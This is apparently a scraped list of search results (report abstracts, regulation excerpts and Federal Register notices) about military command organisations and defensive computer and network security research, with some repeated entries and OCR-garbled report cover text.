command system.2 The United States Southern Command, responsible for Department of Defense planning, coordination, and operations in Central America ...South America and i waters, formed its Joint Interagency Task Force South to enable it to conduct coordinated illicit trafficking operations. ts y...Collin Powell and Secretary of Defense Donald Rumsfeld, the National Security Council has at times been a place for policy to come to die under the
Issues in Afloat Command Control: The Computer-Commander Interface
1979-03-01
LEVEL NAVAL POSTGRADUATE SCHOOL Monterey, California SEP 1 1979 Jl THESIS SC ISSUES IN AFLOAT COMMAND CONTROL: LUJ THE COMPUTER-COMMANDER INTERFACE...jJ./Hurley I?. DISORIUUO" AN ST A TEMENT e . ur.o i .AN As i, ’a’ P",M,,nI_..I ,, T. TA4R IS.2 SUPLMNTR NOTUES Naval Postgraduate School ,Monterey...California 93940 Naval Postgraduate School Monterey, California 93940 8d1u ..... . 1. ThRisa thesiCs exAM•ines afloat command €.. ,1. Scn CUtTr CLASS
DOE Office of Scientific and Technical Information (OSTI.GOV)
Beaver, Justin M; Borges, Raymond Charles; Buckner, Mark A
Critical infrastructure Supervisory Control and Data Acquisition (SCADA) systems were designed to operate on closed, proprietary networks where a malicious insider posed the greatest threat potential. The centralization of control and the movement towards open systems and standards has improved the efficiency of industrial control, but has also exposed legacy SCADA systems to security threats that they were not designed to mitigate. This work explores the viability of machine learning methods in detecting the new threat scenarios of command and data injection. Similar to network intrusion detection systems in the cyber security domain, the command and control communications in amore » critical infrastructure setting are monitored, and vetted against examples of benign and malicious command traffic, in order to identify potential attack events. Multiple learning methods are evaluated using a dataset of Remote Terminal Unit communications, which included both normal operations and instances of command and data injection attack scenarios.« less
Enabling Theater Security Cooperation Through Regionally Aligned Forces
2013-03-01
combatant commanders in successfully implementing this initiative, the Service and the Department of Defense will have to overcome several significant...commanders in successfully implementing this initiative, the Service and the Department of Defense will have to overcome several significant challenges...combatant commands, but several significant challenges must be overcome for the RAF to become a viable force employment concept. Analyzing the Army’s
The DISAM Journal of International Security Assistance Management. Volume 23, Number 1, Fall 2000
2000-01-01
Security Assistance Command Figure 1 The USASAC, including OPM-SANG, is staffed by 621 men and women , of whom 104 are military. These professionals are...by program managers. These program managers are like “front-line entreprenuers ” delivering products and services to their customers. They have been...NATO history was to be commanded by a Polish general in June 1988. The brigade of some 3000 men and women was composed of five national battalions
2006-02-17
included system-unique specifications derived to counter these threats. But the international security environment has changed --- and it will continue... Netowrk -Centric Command and Control 5a. CONTRACT NUMBER 5b. GRANT NUMBER 5c. PROGRAM ELEMENT NUMBER 6. AUTHOR(S) 5d. PROJECT NUMBER 5e. TASK...contains color images. 14. ABSTRACT 15. SUBJECT TERMS 16. SECURITY CLASSIFICATION OF: 17. LIMITATION OF ABSTRACT 18. NUMBER OF PAGES 20 19a. NAME
2008-12-19
Undistributed ISFF-Funded Equipment 105 17. Iraqi Army Maintenance Program 107 18. Class IX Material Management 115 Part V – Medical Sustainability 123...database and are subsequently forwarded to the Army Material Command, Logistics Support Activity for inclusion in the DoD Small Arms and Light Weapons...be forwarded to the Army Material Command, Logistics Support Activity for inclusion in the DoD Small Arms and Light Weapons Serialization Program
The Command of Space: A National Vision for American Prosperity and Security
2000-03-01
are also made for the president and Congress to advance toward the goal of commanding space. The future requires a national effort to master all...information flows and these are increasingly space dependent. Both a nation’s prosperity and security, now and in the future , are thus linked to...or future adversaries—China—compete with the U.S. China is expected to surpass the size of the U.S. economy in about ten years. While a vision for
What It Takes. Air Force Command of Joint Operations
2009-01-01
Iraq Assistance Group IDE intermediate developmental education IO international organization ISAF International Security and Assistance Force ISR...Operations Table A.1—Continued Joint Task Force Mission/Operation Start End Service Command Rank JTF–Joint Area Support Group (JASG) Iraqi Freedom...be of interest to a wide group of Air Force personnel involved in the development and func- tion of the service’s command organizations, including
2009-03-03
Army Special Forces. Following a 2008 meeting with Gen James N. Mattis (Commander, US Joint Forces Command), Gen James T. Conway (Commandant, US...CAPABILITY Approved by: , Thesis Committee Chair James B. Martin, Ph.D. , Member Gary J. Bjorge, Ph.D. , Member Robert D...Technology: Information technology, bio -technology, weaponry, increased access to information Demographic Changes: Population growth, youth bulge
Secure Publish-Subscribe Protocols for Heterogeneous Medical Wireless Body Area Networks
Picazo-Sanchez, Pablo; Tapiador, Juan E.; Peris-Lopez, Pedro; Suarez-Tangil, Guillermo
2014-01-01
Security and privacy issues in medical wireless body area networks (WBANs) constitute a major unsolved concern because of the challenges posed by the scarcity of resources in WBAN devices and the usability restrictions imposed by the healthcare domain. In this paper, we describe a WBAN architecture based on the well-known publish-subscribe paradigm. We present two protocols for publishing data and sending commands to a sensor that guarantee confidentiality and fine-grained access control. Both protocols are based on a recently proposed ciphertext policy attribute-based encryption (CP-ABE) scheme that is lightweight enough to be embedded into wearable sensors. We show how sensors can implement lattice-based access control (LBAC) policies using this scheme, which are highly appropriate for the eHealth domain. We report experimental results with a prototype implementation demonstrating the suitability of our proposed solution. PMID:25460814
32 CFR 245.6 - Abbreviations and acronyms.
Code of Federal Regulations, 2011 CFR
2011-07-01
...—Domestic Event Network DHS—Department of Homeland Security DND—Department of National Defence (Canada) DoD... (NORAD) NORAD—North American Aerospace Defense Command PACAF—Pacific Air Forces SCA—Security Control Authorization SEADS—Southeast Air Defense Sector (NORAD) SUA—Special Use Airspace TSA—Transportation Security...
32 CFR 245.6 - Abbreviations and acronyms.
Code of Federal Regulations, 2012 CFR
2012-07-01
...—Domestic Event Network DHS—Department of Homeland Security DND—Department of National Defence (Canada) DoD... (NORAD) NORAD—North American Aerospace Defense Command PACAF—Pacific Air Forces SCA—Security Control Authorization SEADS—Southeast Air Defense Sector (NORAD) SUA—Special Use Airspace TSA—Transportation Security...
32 CFR 245.6 - Abbreviations and acronyms.
Code of Federal Regulations, 2014 CFR
2014-07-01
...—Domestic Event Network DHS—Department of Homeland Security DND—Department of National Defence (Canada) DoD... (NORAD) NORAD—North American Aerospace Defense Command PACAF—Pacific Air Forces SCA—Security Control Authorization SEADS—Southeast Air Defense Sector (NORAD) SUA—Special Use Airspace TSA—Transportation Security...
32 CFR 245.6 - Abbreviations and acronyms.
Code of Federal Regulations, 2013 CFR
2013-07-01
...—Domestic Event Network DHS—Department of Homeland Security DND—Department of National Defence (Canada) DoD... (NORAD) NORAD—North American Aerospace Defense Command PACAF—Pacific Air Forces SCA—Security Control Authorization SEADS—Southeast Air Defense Sector (NORAD) SUA—Special Use Airspace TSA—Transportation Security...
Evaluation of Organisational Interoperabiity in a Network Centric Warfare Environment
2004-09-01
understanding developed. Command and Coordination examines issues related to command structure, command and leadership styles . Ethos covers socio...harmonisation of command arrangements and the accommodation of differences in command and leadership styles . 3.2.4 Ethos Future warfare will... leadership styles . • changes to give less emphasis to hierarchy and command and more to coordination. Any reference to a single chain of command has been
The Essentials of Safety and Security Management.
ERIC Educational Resources Information Center
Jones, Lance D.
2003-01-01
Presents a road map for colleges and universities to follow when establishing an in-house protective services department, focusing on: the leadership and command structure, screening and hiring of security officers, training of campus security personnel, documentation of officers' actions, policies and procedures (particularly regarding the use of…
U.S. Northern Command Counterterrorism Response Force Requirement
2016-06-10
PERFORMING ORGANIZATION NAME( S ) AND ADDRESS(ES) U.S. Army Command and General Staff College ATTN: ATZL-SWD-GD Fort Leavenworth, KS 66027-2301 8...Command and General Staff College in partial fulfillment of the requirements for the degree MASTER OF MILITARY ART AND SCIENCE Homeland Security...Studies by MATTHEW D. BARTELS, MAJOR, U.S. MARINE CORPS M.A., U.S. Naval War College , Newport, Rhode Island, 2015
Anticipating and Understanding the Rebalance: Exercise Nine Innings, USMC Command and Staff College
2017-06-21
USPACOM, professional military education , PME, Command and Staff College, training, education , Exercise Nine Innings, regional security challenges The...essence, professional military education had to keep up with the tempo of the evolution of warfare in the twenty-first century. Knowing and...operations existing in differing phases of execution, gained great- er interest among education commands, the Marine Corps, and joint leader- ship.4
Building a Foundation on Sand: The Demise of Leaders Resulting from Toxic Followership
2016-05-26
Toxic Followers, Prototype Theory, Mission Command, Operational Art , McClellan, Johnston, MacArthur, Powell, 16. SECURITY CLASSIFICATION OF: a. REPORT...structured and more vague problems. Using mission command throughout the Army facilitates leaders practicing operational art .2 Current US joint doctrine...defines operational art as the “use of creative thinking by commanders and staffs to design strategies, campaigns, and major operations and organize
NASA Technical Reports Server (NTRS)
Gunawan, Ryan A.
2016-01-01
With the rapid development of the Internet, the number of malicious threats to organizations is continually increasing. In June of 2015, the United States Office of Personnel Management (OPM) had a data breach resulting in the compromise of millions of government employee records. The National Aeronautics and Space Administration (NASA) is not exempt from these attacks. Cyber security is becoming a critical facet to the discussion of moving forward with projects. The Spaceport Command and Control System (SCCS) project at the Kennedy Space Center (KSC) aims to develop the launch control system for the next generation launch vehicle in the coming decades. There are many ways to increase the security of the network it uses, from vulnerability management to ensuring operating system images are compliant with securely configured baselines recommended by the United States Government.
Joint Logistics Commanders Guide for the Management of Multinational Program,
1981-07-01
purchase of the A-300 Airbus and the 1977 record-breaking export performance of the French and UK aerospace industries of around $5 billion and $2 billion...DIS. They are the Defense Industrial Security Clearance Office ( DISCO ), the Defense Industrial Security Institute (DISI), and the Office of Industrial...Security International (ISI). Defense Industrial Security Clearance Office ( DISCO ) The Defense Industrial Security Program (DISP) establishes pro
46 CFR 118.425 - Galley hood fire extinguishing systems.
Code of Federal Regulations, 2010 CFR
2010-10-01
... other standard specified by the Commandant, and must be listed by an independent laboratory recognized... 118.425 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) SMALL PASSENGER VESSELS... for Commercial Cooking Equipment,” or other standard specified by the Commandant. (b) A grease...
32 CFR 64.2 - Applicability and scope.
Code of Federal Regulations, 2014 CFR
2014-07-01
... Homeland Security), the Chairman of the Joint Chiefs of Staff, the Combatant Commands, the Office of the... Military Departments and the Secretary of Homeland Security for the Coast Guard when it is not operating as..., such as the Department of Homeland Security and the Selective Service System, and non-DoD organizations...
32 CFR 64.2 - Applicability and scope.
Code of Federal Regulations, 2010 CFR
2010-07-01
... Homeland Security), the Chairman of the Joint Chiefs of Staff, the Combatant Commands, the Office of the... Military Departments and the Secretary of Homeland Security for the Coast Guard when it is not operating as..., such as the Department of Homeland Security and the Selective Service System, and non-DoD organizations...
32 CFR 64.2 - Applicability and scope.
Code of Federal Regulations, 2012 CFR
2012-07-01
... Homeland Security), the Chairman of the Joint Chiefs of Staff, the Combatant Commands, the Office of the... Military Departments and the Secretary of Homeland Security for the Coast Guard when it is not operating as..., such as the Department of Homeland Security and the Selective Service System, and non-DoD organizations...
32 CFR 64.2 - Applicability and scope.
Code of Federal Regulations, 2013 CFR
2013-07-01
... Homeland Security), the Chairman of the Joint Chiefs of Staff, the Combatant Commands, the Office of the... Military Departments and the Secretary of Homeland Security for the Coast Guard when it is not operating as..., such as the Department of Homeland Security and the Selective Service System, and non-DoD organizations...
32 CFR 64.2 - Applicability and scope.
Code of Federal Regulations, 2011 CFR
2011-07-01
... Homeland Security), the Chairman of the Joint Chiefs of Staff, the Combatant Commands, the Office of the... Military Departments and the Secretary of Homeland Security for the Coast Guard when it is not operating as..., such as the Department of Homeland Security and the Selective Service System, and non-DoD organizations...
The Building Blocks of School Security.
ERIC Educational Resources Information Center
Funck, Gary
1999-01-01
Few schools command the funding to shift from zero security to updated closed-circuit TV systems. Cost-effective school security identification cards, which provide a rapid means of identifying those belonging on campus, can be integrated with administrative systems to track attendance, age, subject studied, and other vital statistics. (MLH)
75 FR 67695 - U.S. Strategic Command Strategic Advisory Group Closed Meeting
Federal Register 2010, 2011, 2012, 2013, 2014
2010-11-03
... DEPARTMENT OF DEFENSE Office of the Secretary of Defense U.S. Strategic Command Strategic Advisory... meeting notice of the U.S. Strategic Command Strategic Advisory Group. DATES: December 9, 2010: 8 a.m. to..., intelligence, and policy-related issues to the Commander, U.S. Strategic Command, during the development of the...
Federal Register 2010, 2011, 2012, 2013, 2014
2013-03-25
... DEPARTMENT OF DEFENSE Office of the Secretary U.S. Strategic Command Strategic Advisory Group... following federal advisory committee: U.S. Strategic Command Strategic Advisory Group. DATES: April 18, 2013..., intelligence, and policy-related issues to the Commander, U.S. Strategic Command, during the development of the...
Federal Register 2010, 2011, 2012, 2013, 2014
2013-11-08
.... Strategic Command Strategic Advisory Group AGENCY: Department of Defense. ACTION: Notice of Advisory... following Federal Advisory Committee meeting of the U.S. Strategic Command Strategic Advisory Group. DATES... issues to the Commander, U.S. Strategic Command, during the development of the Nation's strategic war...
NASA Technical Reports Server (NTRS)
Nichols, Kelvin F.; Best, Susan; Schneider, Larry
2004-01-01
With so many security issues involved with wireless networks, the technology has not been fully utilized in the area of mission critical applications. These applications would include the areas of telemetry, commanding, voice and video. Wireless networking would allow payload operators the mobility to take computers outside of the control room to their offices and anywhere else in the facility that the wireless network was extended. But the risk is too great of having someone sit just inside of your wireless network coverage and intercept enough of your network traffic to steal proprietary data from a payload experiment or worse yet hack back into your system and do even greater harm by issuing harmful commands. Wired Equivalent Privacy (WEP) is improving but has a ways to go before it can be trusted to protect mission critical data. Today s hackers are becoming more aggressive and innovative, and in order to take advantage of the benefits that wireless networking offer, appropriate security measures need to be in place that will thwart hackers. The Virtual Private Network (VPN) offers a solution to the security problems that have kept wireless networks from being used for mission critical applications. VPN provides a level of encryption that will ensure that data is protected while it is being transmitted over a wireless local area network (IAN). The VPN allows a user to authenticate to the site that the user needs to access. Once this authentication has taken place the network traffic between that site and the user is encapsulated in VPN packets with the Triple Data Encryption Standard (3DES). 3DES is an encryption standard that uses a single secret key to encrypt and decrypt data. The length of the encryption key is 168 bits as opposed to its predecessor DES that has a 56-bit encryption key. Even though 3DES is the common encryption standard for today, the Advance Encryption Standard (AES), which provides even better encryption at a lower cycle cost is growing acceptance. The user computer running the VPN client and the. target site that is running the . VPN firewall exchange this encryption key and therefore are the only ones that are able to decipher the data. The level of encryption offered by the VPN is making it possible for wireless networks to pass the strict security policies that have kept them from being used in the past. Now people will be able to benefit from the many advantages that wireless networking has to offer in the area of mission critical applications.
NASA Technical Reports Server (NTRS)
Nichols, Kelvin F.; Best, Susan; Schneider, Larry
2004-01-01
With so many security issues involved with wireless networks, the technology has not been fully utilized in the area of mission critical applications. These applications would include the areas of telemetry, commanding, voice and video. Wireless networking would allow payload operators the mobility to take computers outside of the control room to their off ices and anywhere else in the facility that the wireless network was extended. But the risk is too great of having someone sit just inside of your wireless network coverage and intercept enough of your network traffic to steal proprietary data from a payload experiment or worse yet hack back into your system and do even greater harm by issuing harmful commands. Wired Equivalent Privacy (WEP) is improving but has a ways to go before it can be trusted to protect mission critical data. Today s hackers are becoming more aggressive and innovative, and in order to take advantage of the benefits that wireless networking offer, appropriate security measures need to be in place that will thwart hackers. The Virtual Private Network (VPN) offers a solution to the security problems that have kept wireless networks from being used for mission critical applications. VPN provides a level of encryption that will ensure that data is protected while it is being transmitted over a wireless local area network (LAN). The VPN allows a user to authenticate to the site that the user needs to access. Once this authentication has taken place the network traffic between that site and the user is encapsulated in VPN packets with the Triple Data Encryption Standard (3DES). 3DES is an encryption standard that uses a single secret key to encrypt and decrypt data. The length of the encryption key is 168 bits as opposed to its predecessor DES that has a 56-bit encryption key. Even though 3DES is the common encryption standard for today, the Advance Encryption Standard (AES), which provides even better encryption at a lower cycle cost is growing acceptance. The user computer running the VPN client and the target site that is running the VPN firewall exchange this encryption key and therefore are the only ones that are able to decipher the data. The level of encryption offered by the VPN is making it possible for wireless networks to pass the strict security policies that have kept them from being used in the past. Now people will be able to benefit from the many advantages that wireless networking has to offer in the area of mission critical applications.
United States Air Force Security Forces in an Era of Terrorist Threats
1999-06-01
their primary duties. The third alternative is to eliminate the Palace Tenure deployments of security personnel and replace them with dedicated units...The Phoenix Raven program, the 820th Security Forces Group, and Palace Tenure commitments. The specified mission varies by organization, but the...820th Security Forces Group. January 1999, slide 4. 166 Statement of LT. Col. Larry A. Buckingham , 820th Security Forces Group Commander, “820th Security
Remote Wiping and Secure Deletion on Mobile Devices: A Review.
Leom, Ming Di; Choo, Kim-Kwang Raymond; Hunt, Ray
2016-11-01
Mobile devices have become ubiquitous in almost every sector of both private and commercial endeavors. As a result of such widespread use in everyday life, many users knowingly and unknowingly save significant amounts of personal and/or commercial data on these mobile devices. Thus, loss of mobile devices through accident or theft can expose users-and their businesses-to significant personal and corporate cost. To mitigate this data leakage issue, remote wiping features have been introduced to modern mobile devices. Given the destructive nature of such a feature, however, it may be subject to criminal exploitation (e.g., a criminal exploiting one or more vulnerabilities to issue a remote wiping command to the victim's device). To obtain a better understanding of remote wiping, we survey the literature, focusing on existing approaches to secure flash storage deletion and provide a critical analysis and comparison of a variety of published research in this area. In support of our analysis, we further provide prototype experimental results for three Android devices, thus providing both a theoretical and applied focus to this article as well as providing directions for further research. © 2016 American Academy of Forensic Sciences.
CENTCOM: Search CENTCOM CENTCOM Home ABOUT US COMMAND NARRATIVE LEADERSHIP COMPONENT COMMANDS HISTORY , security forces May 14, 2018 Syrian Democratic Forces fire in self-defense May 11, 2018 Military Strikes against Daesh terrorists in Iraq and Syria May 04, 2018 Syrian Democratic Forces announce drive to reclaim
46 CFR 181.425 - Galley hood fire extinguishing systems.
Code of Federal Regulations, 2010 CFR
2010-10-01
...), or other standard specified by the Commandant, and must be listed by an independent laboratory... 181.425 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) SMALL PASSENGER VESSELS... UL 710 (incorporated by reference, see 46 CFR 175.600) or other standard specified by the Commandant...
2012-10-30
James Mattis , Commander of CENTCOM, and General John Allen, Commander of the International Security Assistance Force (ISAF) warning that Afghan con...September 17, 2012, CENTCOM commander General James N. Mattis advised DoD heads of contracting to avoid contracting with 20 individuals and entities...Admiral James Stavridis, at Panetta’s left. NATO Secretary General Anders Fogh Rasmussen stands at Panetta’s right. (DoD photo) SPECIAL INSPECTOR GENERAL
Command History. United States Military Assistance Command, Vietnam 1965. Sanitized
1965-01-01
support elements within the ARM battalion 4 ese methods of encadrement were studied in relation to language , security, support, mutual US/ARYN acceptance...problema, and conditions and capabilities within ARYN units, Problew comn to all three methods were the language barrier, increased ewosure of US...DECCU•(ACV took the position that US assmption of command was neither feasible nor desirable, vwng to the language barrier as won as the probable non
Requirements for the Military Message System (MMS) Family: Data Types and User Commands.
1986-04-11
AD-A167 126 REQUIREMENTS FOR THE MILITARY MESSASE SYSTEM (NHS) i FRILY: DATA TYPES AND USER CONNNDS(U) NAVAL RESEARCH LAB WASHINGTON DC C L HEITHEVER... System (MMS) Family: Data Types and User Commands CONSTANCE L. HEITMEYER Computer Science and Systems Branch I Information Technology Division April 11...Security Classification) Requirements for the Military Message System (MMS) Family: Data Types and User Commands 12. PERSONAL AUTHOR(S) Heitmeer, Constance
Jones, Jake S.
1999-01-01
An apparatus and method of issuing commands to a computer by a user interfacing with a virtual reality environment. To issue a command, the user directs gaze at a virtual button within the virtual reality environment, causing a perceptible change in the virtual button, which then sends a command corresponding to the virtual button to the computer, optionally after a confirming action is performed by the user, such as depressing a thumb switch.
76 FR 14950 - Closed Meeting of the U.S. Strategic Command Strategic Advisory Group
Federal Register 2010, 2011, 2012, 2013, 2014
2011-03-18
... DEPARTMENT OF DEFENSE Office of the Secretary Closed Meeting of the U.S. Strategic Command.... Strategic Command Strategic Advisory Group. DATES: April 7, 2011, from 8 a.m. to 5 p.m. and April 8, 2011... policy-related issues to the Commander, U.S. Strategic Command, during the development of the Nation's...
Federal Register 2010, 2011, 2012, 2013, 2014
2011-08-23
... DEPARTMENT OF DEFENSE Notice of Advisory Committee Closed Meeting; U.S. Strategic Command.... Strategic Command Strategic Advisory Group. DATES: November 1, 2011, from 8 a.m. to 5 p.m. and November 2..., intelligence, and policy-related issues to the Commander, U.S. Strategic Command, during the development of the...
40. Upper level, electronic racks, left to rightstatus command message ...
40. Upper level, electronic racks, left to right--status command message processing group, UHF radio, impss rack security, power supply group rack - Ellsworth Air Force Base, Delta Flight, Launch Facility, On County Road T512, south of Exit 116 off I-90, Interior, Jackson County, SD
1988-07-01
Security Classification) Mtutagenic potential of nitroguan idine in the Drosophila melano- gaster sex-linked recessive lethal test 12. PERSONAL AUTHOR(S...Frederick, MD 21701-5012 Commander Commandant US Army Environmental Hygine Academy of Health Sciences. US Army Agency ATTN: AHS-CDM ATTN: Librarian, HSDH
Transformation of the Romanian Army
2006-01-01
Regeneration Forces. 19General Eugen Badalan, Fortele Terestre în Contextul Aderãrii României la NATO, 51. 20Commander Dorin Ionescu, “Principii...priorities set by the White Paper on Security and National Defense. 24The study is written by Commander Dorin Ionescu, “Principii si Politici Privind
33 CFR 67.40-1 - Notification to District Commander.
Code of Federal Regulations, 2011 CFR
2011-07-01
... 33 Navigation and Navigable Waters 1 2011-07-01 2011-07-01 false Notification to District Commander. 67.40-1 Section 67.40-1 Navigation and Navigable Waters COAST GUARD, DEPARTMENT OF HOMELAND SECURITY AIDS TO NAVIGATION AIDS TO NAVIGATION ON ARTIFICIAL ISLANDS AND FIXED STRUCTURES Notification § 67...
33 CFR 67.40-1 - Notification to District Commander.
Code of Federal Regulations, 2010 CFR
2010-07-01
... 33 Navigation and Navigable Waters 1 2010-07-01 2010-07-01 false Notification to District Commander. 67.40-1 Section 67.40-1 Navigation and Navigable Waters COAST GUARD, DEPARTMENT OF HOMELAND SECURITY AIDS TO NAVIGATION AIDS TO NAVIGATION ON ARTIFICIAL ISLANDS AND FIXED STRUCTURES Notification § 67...
76 FR 78286 - Collection of Information Under Review by Office of Management and Budget
Federal Register 2010, 2011, 2012, 2013, 2014
2011-12-16
..., between 9 a.m. and 5 p.m., Monday through Friday, except Federal holidays. OIRA posts its decisions on.... Coast Guard, Acting Assistant Commandant for Command, Control, Communications, Computers and Information... DEPARTMENT OF HOMELAND SECURITY Coast Guard [USCG-2011-0902] Collection of Information Under...
78 FR 45545 - Collection of Information under Review by Office of Management and Budget
Federal Register 2010, 2011, 2012, 2013, 2014
2013-07-29
.... OIRA posts its decisions on ICRs online at http://www.reginfo.gov/public/do/PRAMain after the comment... Commandant for Command, Control, Communications, Computers and Information Technology. [FR Doc. 2013-18068... DEPARTMENT OF HOMELAND SECURITY Coast Guard [USCG-2013-0045] Collection of Information under...
NASA Technical Reports Server (NTRS)
2005-01-01
This document provides a study of the technical literature related to Command and Control (C2) link security for Unmanned Aircraft Systems (UAS) for operation in the National Airspace System (NAS). Included is a preliminary set of functional requirements for C2 link security.
Jones, J.S.
1999-01-12
An apparatus and method of issuing commands to a computer by a user interfacing with a virtual reality environment are disclosed. To issue a command, the user directs gaze at a virtual button within the virtual reality environment, causing a perceptible change in the virtual button, which then sends a command corresponding to the virtual button to the computer, optionally after a confirming action is performed by the user, such as depressing a thumb switch. 4 figs.
Maintainability Engineering Design Notebook, Revision 2, and Cost of Maintainability
1975-01-01
coordi- nation efforts with other majur commands such as .he.Air Force Logistics Com- mand, Air Training Command, and the operating command. The...AND ADDRESS IS. REPORT DATE Rome Air Development Center (RERS) January 1975 Griffiss Air Force Base, New York 13441 13. NUMRER OF PAGES t I...of Air Force ground electronic Systems DO . 1AN 1473 EDITION OF I NOV MUSS ORSOLETE UNCLASSIFIED N SECURITY CLASOIFICATISN4 OF THIS PAGE (t- D.I
Assessment of the Office of Security Cooperation-Iraq Mission Capabilities
2013-09-18
and report and other activities conducted by the Office of Special Plans & Operations to spo@dodig.mil Defense Hotline, The Pentagon ... Defense for Policy, U.S. Cenh·al Command, Joint Staff, and Defense Security Cooperation Agency responses when preparing the final repmt. Please...of Department of Defense support for executing security cooperation programs in Iraq and whether the Office of Security
Federal Security Laboratory Governance Panels: Observations and Recommendations
2013-01-01
operates under a sole-source, cost-plus-fixed-fee contract administered by the U.S. Navy’s Naval Sea Systems Command. There are currently 14 UARCs, 13... system of research organizations that support science and technology for U.S. national security. Within this system , the Departments of Defense, Energy...and Homeland Security support about 80 laboratories that focus predominantly on national security matters. These laboratories have different
2010-03-17
the sole "superpower" and once again changed the international security paradigm. Finally, on September 11, 2001, a terrorist attack on the U.S. by...be employed in the near term in order to improve operations in today’s security environment. Cooperative security is intended to change how militruy...default. However, the changing world security environment has dictated that the U.S. avoids any actions that could be perceived as heavy-handed
46 CFR 5.807 - Commandant's Decision on Review.
Code of Federal Regulations, 2010 CFR
2010-10-01
... 46 Shipping 1 2010-10-01 2010-10-01 false Commandant's Decision on Review. 5.807 Section 5.807 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY PROCEDURES APPLICABLE TO THE PUBLIC MARINE..., Sector Offices and Marine Inspection Offices. (See 33 CFR subpart 1.10.) [CGD 82-002, 50 FR 32184, Aug. 9...
DOE Office of Scientific and Technical Information (OSTI.GOV)
El Hariri, Mohamad; Faddel, Samy; Mohammed, Osama
Decentralized and hierarchical microgrid control strategies have lain the groundwork for shaping the future smart grid. Such control approaches require the cooperation between microgrid operators in control centers, intelligent microcontrollers, and remote terminal units via secure and reliable communication networks. In order to enhance the security and complement the work of network intrusion detection systems, this paper presents an artificially intelligent physical model-checking that detects tampered-with circuit breaker switching control commands whether, due to a cyber-attack or human error. In this technique, distributed agents, which are monitoring sectionalized areas of a given microgrid, will be trained and continuously adapted tomore » verify that incoming control commands do not violate the physical system operational standards and do not put the microgrid in an insecure state. The potential of this approach has been tested by deploying agents that monitor circuit breakers status commands on a 14-bus IEEE benchmark system. The results showed the accuracy of the proposed framework in characterizing the power system and successfully detecting malicious and/or erroneous control commands.« less
SPYING FOR THE RIGHT REASONS: CONTESTED NORMS IN CYBERSPACE
2017-04-06
the organizational built up of the German Cyber Command. iii Abstract When former National Security Agency contractor Edward Snowden...Introduction In June 2013, former National Security Agency (NSA) contractor Edward Snowden revealed that the United States was spying on 122
Secure video communications system
Smith, Robert L.
1991-01-01
A secure video communications system having at least one command network formed by a combination of subsystems. The combination of subsystems to include a video subsystem, an audio subsystem, a communications subsystem, and a control subsystem. The video communications system to be window driven and mouse operated, and having the ability to allow for secure point-to-point real-time teleconferencing.
Addressing security issues related to virtual institute distributed activities
NASA Astrophysics Data System (ADS)
Stytz, Martin R.; Banks, Sheila B.
2008-03-01
One issue confounding the development and experimentation of distributed modeling and simulation environments is the inability of the project team to identify and collaborate with resources, both human and technical, from outside the United States. This limitation is especially significant within the human behavior representation area where areas such as cultural effects research and joint command team behavior modeling require the participation of various cultural and national representatives. To address this limitation, as well as other human behavior representation research issues, NATO Research and Technology Organization initiated a project to develop a NATO virtual institute that enables more effective and more collaborative research into human behavior representation. However, in building and operating a virtual institute one of the chief concerns must be the cyber security of the institute. Because the institute "exists" in cyberspace, all of its activities are susceptible to cyberattacks, subterfuge, denial of service and all of the vulnerabilities that networked computers must face. In our opinion, for the concept of virtual institutes to be successful and useful, their operations and services must be protected from the threats in the cyber environment. A key to developing the required protection is the development and promulgation of standards for cyber security. In this paper, we discuss the types of cyber standards that are required, how new internet technologies can be exploited and can benefit the promulgation, development, maintenance, and robustness of the standards. This paper is organized as follows. Section One introduces the concept of the virtual institutes, the expected benefits, and the motivation for our research and for research in this area. Section Two presents background material and a discussion of topics related to VIs, uman behavior and cultural modeling, and network-centric warfare. Section Three contains a discussion of the security challenges that face the virtual institute and the characteristics of the standards that must be employed. Section Four contains our proposal for documentation of the cybersecurity standards. Section Five contains the conclusion and suggestions for further work.
Federal Register 2010, 2011, 2012, 2013, 2014
2012-10-10
.... Strategic Command Strategic Advisory Group AGENCY: Department of Defense. ACTION: Notice of Advisory... advisory committee: U.S. Strategic Command Strategic Advisory Group. DATES: November 15, 2012, from 8 a.m... Command, during the development of the Nation's strategic war plans. Agenda: Topics include: Policy Issues...
Re-engineering the Multimission Command System at the Jet Propulsion Laboratory
NASA Technical Reports Server (NTRS)
Alexander, Scott; Biesiadecki, Jeff; Cox, Nagin; Murphy, Susan C.; Reeve, Tim
1994-01-01
The Operations Engineering Lab (OEL) at JPL has developed the multimission command system as part of JPL's Advanced Multimission Operations System. The command system provides an advanced multimission environment for secure, concurrent commanding of multiple spacecraft. The command functions include real-time command generation, command translation and radiation, status reporting, some remote control of Deep Space Network antenna functions, and command file management. The mission-independent architecture has allowed easy adaptation to new flight projects and the system currently supports all JPL planetary missions (Voyager, Galileo, Magellan, Ulysses, Mars Pathfinder, and CASSINI). This paper will discuss the design and implementation of the command software, especially trade-offs and lessons learned from practical operational use. The lessons learned have resulted in a re-engineering of the command system, especially in its user interface and new automation capabilities. The redesign has allowed streamlining of command operations with significant improvements in productivity and ease of use. In addition, the new system has provided a command capability that works equally well for real-time operations and within a spacecraft testbed. This paper will also discuss new development work including a multimission command database toolkit, a universal command translator for sequencing and real-time commands, and incorporation of telecommand capabilities for new missions.
U.S. Combat Commands’ Participation in the Proliferation Security Initiative: A Training Manual
2009-01-01
cadmium-zinc- tellurium DHS Department of Homeland Security DoD Department of Defense EAA Export Administration Act EAR Export Administration Regulations EU...Pulsed fast neutron analysis PSI Proliferation Security Initiative Pu Plutonium SCO Shanghai Cooperation Organization SFI Security Freight Initiative...resolution) sodium iodide (NaI) and (intermediate-resolution) cadmium-zinc- tellurium (CZT) detectors may not have the energy resolution and/or sensitivity
2012-05-04
FINAL 3. DATES COVERED (From - To) 4. TITLE AND SUBTITLE 5a. CONTRACT NUMBER Combatting Terrorism, Rebel Groups , and Armed...facing many security threats. Al-Shabaab in Somalia, armed rebel groups , and armed militia in South Sudan pose the greatest security challenges to the...these groups . 15. SUBJECT TERMS United States Africa Command, Al-Shabaab, Lamu Oil Pipeline, Security. 16. SECURITY CLASSIFICATION OF: 17
DOE Office of Scientific and Technical Information (OSTI.GOV)
Knipper, W.
This presentation builds on our response to events that pose, or have the potential to pose, a serious security or law enforcement risk and must be responded to and controlled in a clear a decisive fashion. We will examine some common concepts in the command and control of security-centric events.
Code of Federal Regulations, 2013 CFR
2013-10-01
